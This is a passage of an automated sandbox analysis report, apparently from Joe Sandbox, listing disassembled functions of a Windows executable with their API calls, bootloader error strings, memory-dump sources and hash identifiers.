                                                                                                                        • Instruction ID: f262562618a1399e67060d60d5b07a0dd42001fe04e9522ff77f23afc289a166
                                                                                                                        • Opcode Fuzzy Hash: 46f8882ba5516ded8d0f67aa9085a497a0d646e74245b223b6bb25c85e55adca
                                                                                                                        • Instruction Fuzzy Hash: 1431A422B3B64291EE59FB12AC20576A394FF4CFA0F9A4535DD1D063A4EF3CE4459B20
                                                                                                                        Function 00007FF7A6736480 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 88COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00007FF7A6737A30: MultiByteToWideChar.KERNEL32 ref: 00007FF7A6737A6A
                                                                                                                        • ExpandEnvironmentStringsW.KERNEL32(00000000,00007FF7A67367CF,?,00000000,?,TokenIntegrityLevel), ref: 00007FF7A67364DF
                                                                                                                          • Part of subcall function 00007FF7A6732770: MessageBoxW.USER32 ref: 00007FF7A6732841
                                                                                                                        Strings
                                                                                                                        • LOADER: Failed to convert runtime-tmpdir to a wide string., xrefs: 00007FF7A67364B6
                                                                                                                        • LOADER: Failed to obtain the absolute path of the runtime-tmpdir., xrefs: 00007FF7A673653A
                                                                                                                        • LOADER: Failed to expand environment variables in the runtime-tmpdir., xrefs: 00007FF7A67364F3
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                        • String ID: LOADER: Failed to convert runtime-tmpdir to a wide string.$LOADER: Failed to expand environment variables in the runtime-tmpdir.$LOADER: Failed to obtain the absolute path of the runtime-tmpdir.
                                                                                                                        • API String ID: 1662231829-3498232454
                                                                                                                        • Opcode ID: e770f63f1b65fbf44ebddb50d5af86b3d9fe6b483d73fb8ce13bd60b0e8df226
                                                                                                                        • Instruction ID: 3a3c263cea496f02c8708554abae6c6d28be2f322e7960fa75d03238a23b4eae
                                                                                                                        • Opcode Fuzzy Hash: e770f63f1b65fbf44ebddb50d5af86b3d9fe6b483d73fb8ce13bd60b0e8df226
                                                                                                                        • Instruction Fuzzy Hash: 90317751B3A74241FA29B725AD753BBD251AF9CF80FC60035DA4E427FAEE2CE5048720
                                                                                                                        Function 00007FF7A6737A30 Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 68COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • MultiByteToWideChar.KERNEL32 ref: 00007FF7A6737A6A
                                                                                                                          • Part of subcall function 00007FF7A6732620: GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7A6737744,?,?,?,?,?,?,?,?,?,?,?,00007FF7A673101D), ref: 00007FF7A6732654
                                                                                                                          • Part of subcall function 00007FF7A6732620: MessageBoxW.USER32 ref: 00007FF7A673272C
                                                                                                                        • MultiByteToWideChar.KERNEL32 ref: 00007FF7A6737AF0
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharMultiWide$ErrorLastMessage
                                                                                                                        • String ID: Failed to decode wchar_t from UTF-8$Failed to get wchar_t buffer size.$MultiByteToWideChar$Out of memory.$win32_utils_from_utf8
                                                                                                                        • API String ID: 3723044601-876015163
                                                                                                                        • Opcode ID: a067ef3949ab1c43b8cad70a8c207a907739284b21da8d2c9820fdf83144c31f
                                                                                                                        • Instruction ID: 967a3ca7d297152a872328c344e5198b210a6ee30a34d39a2bc7ee97d4843f63
                                                                                                                        • Opcode Fuzzy Hash: a067ef3949ab1c43b8cad70a8c207a907739284b21da8d2c9820fdf83144c31f
                                                                                                                        • Instruction Fuzzy Hash: 29217522B29A4281EB14EB29FC6016BE361FF8DB84F954175DB5C83BB9EE2CD5418710
                                                                                                                        Function 00007FF7A674A620 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7A6752433,?,?,?,00007FF7A674CB8C,?,?,00000000,00007FF7A6743A5F,?,?,?,00007FF7A6749313), ref: 00007FF7A674A62F
                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FF7A6752433,?,?,?,00007FF7A674CB8C,?,?,00000000,00007FF7A6743A5F,?,?,?,00007FF7A6749313), ref: 00007FF7A674A644
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7A6752433,?,?,?,00007FF7A674CB8C,?,?,00000000,00007FF7A6743A5F,?,?,?,00007FF7A6749313), ref: 00007FF7A674A665
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7A6752433,?,?,?,00007FF7A674CB8C,?,?,00000000,00007FF7A6743A5F,?,?,?,00007FF7A6749313), ref: 00007FF7A674A692
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7A6752433,?,?,?,00007FF7A674CB8C,?,?,00000000,00007FF7A6743A5F,?,?,?,00007FF7A6749313), ref: 00007FF7A674A6A3
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7A6752433,?,?,?,00007FF7A674CB8C,?,?,00000000,00007FF7A6743A5F,?,?,?,00007FF7A6749313), ref: 00007FF7A674A6B4
                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF7A6752433,?,?,?,00007FF7A674CB8C,?,?,00000000,00007FF7A6743A5F,?,?,?,00007FF7A6749313), ref: 00007FF7A674A6CF
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2506987500-0
                                                                                                                        • Opcode ID: 6fa1fab48d66e1463309dc109adf4585d75bfd82a6fbadce2d7c74c597cc3b40
                                                                                                                        • Instruction ID: 5242238de04645b5be0005924545c28a93733da7487ea7ac6329b58cb286e0b4
                                                                                                                        • Opcode Fuzzy Hash: 6fa1fab48d66e1463309dc109adf4585d75bfd82a6fbadce2d7c74c597cc3b40
                                                                                                                        • Instruction Fuzzy Hash: 58217F20A2F24281F958B7255E7D13BE2419F4CFB0FD64734D83E076FAEE2CA4414622
                                                                                                                        Function 00007FF7A675706C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                        • String ID: CONOUT$
                                                                                                                        • API String ID: 3230265001-3130406586
                                                                                                                        • Opcode ID: 1a41989b306c04176fbb8ce5d038fb17b2eb18ca34d01c5ff4cda60dd112554e
                                                                                                                        • Instruction ID: 4c07a053eb3f35e06aa2a51c56a7e785b3bfd912e64eb7c907231335bd22a929
                                                                                                                        • Opcode Fuzzy Hash: 1a41989b306c04176fbb8ce5d038fb17b2eb18ca34d01c5ff4cda60dd112554e
                                                                                                                        • Instruction Fuzzy Hash: BE115125A39A4186E750AB56EC6432AB3A0FB8CFE4F854234EA5D877A8DF7CD4048750
                                                                                                                        Function 00007FF7A674A798 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(?,?,?,00007FF7A674444D,?,?,?,?,00007FF7A674DDA7,?,?,00000000,00007FF7A674A8B6,?,?,?), ref: 00007FF7A674A7A7
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7A674444D,?,?,?,?,00007FF7A674DDA7,?,?,00000000,00007FF7A674A8B6,?,?,?), ref: 00007FF7A674A7DD
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7A674444D,?,?,?,?,00007FF7A674DDA7,?,?,00000000,00007FF7A674A8B6,?,?,?), ref: 00007FF7A674A80A
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7A674444D,?,?,?,?,00007FF7A674DDA7,?,?,00000000,00007FF7A674A8B6,?,?,?), ref: 00007FF7A674A81B
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7A674444D,?,?,?,?,00007FF7A674DDA7,?,?,00000000,00007FF7A674A8B6,?,?,?), ref: 00007FF7A674A82C
                                                                                                                        • SetLastError.KERNEL32(?,?,?,00007FF7A674444D,?,?,?,?,00007FF7A674DDA7,?,?,00000000,00007FF7A674A8B6,?,?,?), ref: 00007FF7A674A847
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Value$ErrorLast
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2506987500-0
                                                                                                                        • Opcode ID: f18d8f431814927885b9c894ece884b545559122ce24857c2491552e22e71327
                                                                                                                        • Instruction ID: 6df063d0a4955ec81aa1ad2c0aa30e5c79200100e48560a8c2674b0eeb1cb4f6
                                                                                                                        • Opcode Fuzzy Hash: f18d8f431814927885b9c894ece884b545559122ce24857c2491552e22e71327
                                                                                                                        • Instruction Fuzzy Hash: CB115E20E6E28242F569B7215D7D13BD2519F4CFB0FD64234D82E076FAEE2CA4428621
                                                                                                                        Function 00007FF7A673C8A8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                        • String ID: csm$f
                                                                                                                        • API String ID: 2395640692-629598281
                                                                                                                        • Opcode ID: 42fbbb83cedbe148bfcc1de87ea3e914151e174f0a46670c6939306692d2d31c
                                                                                                                        • Instruction ID: ccf7124226afa33427df31b4d77c0dca07b95b3b7121cde9b672d59fbb6d3bdf
                                                                                                                        • Opcode Fuzzy Hash: 42fbbb83cedbe148bfcc1de87ea3e914151e174f0a46670c6939306692d2d31c
                                                                                                                        • Instruction Fuzzy Hash: 3E51A632B2A60286D718EF15DC14A3AB795FB48F88F938131DA5A47768DF38E941D710
                                                                                                                        Function 00007FF7A6732240 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
                                                                                                                        • String ID: Unhandled exception in script
                                                                                                                        • API String ID: 3081866767-2699770090
                                                                                                                        • Opcode ID: 6bea62eccc28d19483c18ff1a3e2d52c6af3fb64e3e46481c97fdf2a226d8d74
                                                                                                                        • Instruction ID: a5868c55de474b8a5715958861f313d52b3eae221401e78c37ad0b3982972075
                                                                                                                        • Opcode Fuzzy Hash: 6bea62eccc28d19483c18ff1a3e2d52c6af3fb64e3e46481c97fdf2a226d8d74
                                                                                                                        • Instruction Fuzzy Hash: 2A315572A2A68285EB14EF61EC651EAB350FF4DB84F810135EA4D47A69DF3CD145C710
                                                                                                                        Function 00007FF7A6732620 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67windowCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF7A6737744,?,?,?,?,?,?,?,?,?,?,?,00007FF7A673101D), ref: 00007FF7A6732654
                                                                                                                          • Part of subcall function 00007FF7A67374B0: GetLastError.KERNEL32(00000000,00007FF7A67326A0), ref: 00007FF7A67374D7
                                                                                                                          • Part of subcall function 00007FF7A67374B0: FormatMessageW.KERNEL32(00000000,00007FF7A67326A0), ref: 00007FF7A6737506
                                                                                                                          • Part of subcall function 00007FF7A6737A30: MultiByteToWideChar.KERNEL32 ref: 00007FF7A6737A6A
                                                                                                                        • MessageBoxW.USER32 ref: 00007FF7A673272C
                                                                                                                        • MessageBoxA.USER32 ref: 00007FF7A6732748
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                                                                        • String ID: %s%s: %s$Fatal error detected
                                                                                                                        • API String ID: 2806210788-2410924014
                                                                                                                        • Opcode ID: bd2085b38ade222d48c53e4b242a54a19eedc60d0d0276a39b8304b5fd6b5430
                                                                                                                        • Instruction ID: da8d8634e3e2d2ac8a2dad7c57328b729b365ad173431f21f1b8d2ea3185ed07
                                                                                                                        • Opcode Fuzzy Hash: bd2085b38ade222d48c53e4b242a54a19eedc60d0d0276a39b8304b5fd6b5430
                                                                                                                        • Instruction Fuzzy Hash: 9331237263968591E624BB10E8617DBA364FB88B84FC14036E68D076A9DF3CD645CB50
                                                                                                                        Function 00007FF7A67488E0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                                                                        • API String ID: 4061214504-1276376045
                                                                                                                        • Opcode ID: 611779d08fafb8db9f6fab045cd04065641a8af0ffd245d6ff06f44facfa83ea
                                                                                                                        • Instruction ID: 31d0e2e6b7777f44b0772492ec86a9b9fc3c947f65022709945357579086d472
                                                                                                                        • Opcode Fuzzy Hash: 611779d08fafb8db9f6fab045cd04065641a8af0ffd245d6ff06f44facfa83ea
                                                                                                                        • Instruction Fuzzy Hash: 87F0AF61A2AA0681EB10AB24EC6833A9320EF8DFA5FC90235C56D452F4CF2CD048C320
                                                                                                                        Function 00007FF7A67587A4 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: _set_statfp
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 1156100317-0
                                                                                                                        • Opcode ID: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                        • Instruction ID: add6ee5da73b4e70a20cd281d18b13ffea81cb57fddec07c2f59513221412c71
                                                                                                                        • Opcode Fuzzy Hash: 69d38c35bd33e64192705e47d806ebaffe6519085bb8d16871af39b095092657
                                                                                                                        • Instruction Fuzzy Hash: 0C11B622E3AA3B03F6943164DC613779441AF5CB64F9606B0E57E066FECE2CBC414561
                                                                                                                        Function 00007FF7A674A860 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,00007FF7A6749A73,?,?,00000000,00007FF7A6749D0E,?,?,?,?,?,00007FF7A67421EC), ref: 00007FF7A674A87F
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7A6749A73,?,?,00000000,00007FF7A6749D0E,?,?,?,?,?,00007FF7A67421EC), ref: 00007FF7A674A89E
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7A6749A73,?,?,00000000,00007FF7A6749D0E,?,?,?,?,?,00007FF7A67421EC), ref: 00007FF7A674A8C6
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7A6749A73,?,?,00000000,00007FF7A6749D0E,?,?,?,?,?,00007FF7A67421EC), ref: 00007FF7A674A8D7
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,00007FF7A6749A73,?,?,00000000,00007FF7A6749D0E,?,?,?,?,?,00007FF7A67421EC), ref: 00007FF7A674A8E8
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Value
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3702945584-0
                                                                                                                        • Opcode ID: b230e00eb3a4a963830e94931d1c566e9f2167cfa2cfe95f454d85ffeb99a2ab
                                                                                                                        • Instruction ID: beccfd36791eedf0bc356e6abc101adc16c1d9a30bdc891d7bc20a90bf9a73ae
                                                                                                                        • Opcode Fuzzy Hash: b230e00eb3a4a963830e94931d1c566e9f2167cfa2cfe95f454d85ffeb99a2ab
                                                                                                                        • Instruction Fuzzy Hash: 40113D20E2E28241FA59B7255D7D17BD2459F4DFB0FD64334E83D066FADE2CB4828621
                                                                                                                        Function 00007FF7A674A6F4 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7A6752433,?,?,?,00007FF7A674CB8C,?,?,00000000,00007FF7A6743A5F), ref: 00007FF7A674A705
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7A6752433,?,?,?,00007FF7A674CB8C,?,?,00000000,00007FF7A6743A5F), ref: 00007FF7A674A724
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7A6752433,?,?,?,00007FF7A674CB8C,?,?,00000000,00007FF7A6743A5F), ref: 00007FF7A674A74C
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7A6752433,?,?,?,00007FF7A674CB8C,?,?,00000000,00007FF7A6743A5F), ref: 00007FF7A674A75D
                                                                                                                        • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,00007FF7A6752433,?,?,?,00007FF7A674CB8C,?,?,00000000,00007FF7A6743A5F), ref: 00007FF7A674A76E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740472247.00007FF7A675A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A676D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740520704.00007FF7A677C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1740591717.00007FF7A677E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_7ff7a6730000_T1#U52a9#U624b1.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Value
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3702945584-0
                                                                                                                        • Opcode ID: 2ba98259ac8f671f7b11ef4b4b97e12d4d2c3255f6215eff0bd660afad52eb11
                                                                                                                        • Instruction ID: 2f560798387a1c280311d4b6bbcd65cb9ee7f51912f96fb4bf5144f3f7026518
                                                                                                                        • Opcode Fuzzy Hash: 2ba98259ac8f671f7b11ef4b4b97e12d4d2c3255f6215eff0bd660afad52eb11
                                                                                                                        • Instruction Fuzzy Hash: 0F11E324A6F20241F96AB7714C7E17B92928F4DF70FD64634D83E0A2FADD2CB4814231
                                                                                                                        Function 00007FF7A674F198 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1740404612.00007FF7A6731000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7A6730000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1740360080.00007FF7A6730000.00000002.00000001.01000000.00000003.sdmpDownload File
